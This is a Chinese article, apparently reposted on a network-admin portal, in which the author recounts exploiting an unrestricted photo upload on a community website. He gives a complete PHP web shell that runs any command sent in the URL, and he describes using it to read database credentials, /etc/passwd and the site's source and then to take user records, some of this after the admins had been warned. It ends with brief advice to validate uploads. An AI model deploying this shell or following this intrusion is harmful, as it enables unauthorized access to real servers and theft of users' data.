网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > PHP > PHP安全其它 > 关于php做社区网站的安全性  

关于php做社区网站的安全性

2006-02-27  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

目前我发现某个社区网站中的一个上传“我的照片”功能有着很大的安全隐患因为上传程序未对上传的文件做分析从而我可以上传一个test.php的文件 然后服务器上的名字就为?????.php(?????为数字 

  我的PHP内容如下  网管u家u.bitscn@com

<? 

$dbs=mysql_connect($strDBHost,$strDBUser,$strDBPassword); 

…… 

mysql_close($dbs); 

?> 



  当然……中我只作了个测试没有真正使用数据库但是我以另一个PHP?????.php内容如下  网管论坛bbs_bitsCN_com

<? 

$query=getenv("QUERY_STRING"); 

$command=urldecode($query); 

$stdout=system("$command"); 

网管联盟bitsCN_com



echo "$stdout"; 

?> 



成功的取得 

$strDBHost = "?.?.?.?";  中国网管论坛bbs.bitsCN.com

$strDBPassword = "????"; 

$strDBUser = "root"; 

并连上数据库 



  然后用后一个PHP把上传的PHP命名为CMD.PHP和DB.PHP  网管bitscn_com



  成功取得/ETC/PASSWD和该网站的首页面MAIN.PHP源码。 



  然后我发信警告网管但是他们在第一天没及时修补漏洞于是我对数据库进行分析并上传了个MB.PHP成功的得到数据库内的用户信息。 



  今天他们采取的修补手段是把那个可以上传的目录移去不过这将导致用户暂时不能浏览、上传照片。 



  所以进行此类设计时应该考虑到恶意用户通过直接调用url把恶意数据传个程序而不能以为网页在服务器端就安全了  网管u家u.bitscn@com

TAGs   安全性   网站   社区   关于   quot   上传   PHP   数据库   一个   然后      
 上一篇:php漏洞对策   下一篇:发现了第一只php病毒PHP.Pirus
相关文章列表
关于php做社区网站的安全性 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Discuz插件漏洞攻击
2.简单PHP注入演示
3.两种Discuz网站漏洞的入侵方法
4.php 防注入
5.脚本安全和利用
6.phpMyAdmin远程PHP代码注入漏洞
7.PHP安全问题
8.对PHP漏洞进行攻击之狗尾续貂
9.CGI安全漏洞资料速查v1.0
10.关于php做社区网站的安全性
最新推荐文章:
1.两种Discuz网站漏洞的入侵方法
2.PHP Advanced Transfer Manager多个漏洞
3.phpMyAdmin远程PHP代码注入漏洞
4.通过对php一些服务器端特性的配置加强php
5.脚本安全和利用
6.通过对服务器端特性的配置加强php的安全
7.如何屏蔽掉phpinfo()函数
8.php 安全
9.php 防注入
10.CGI安全漏洞资料速查v1.0
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·华为HCSE OSPF路由协议培训教材 V3.0
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血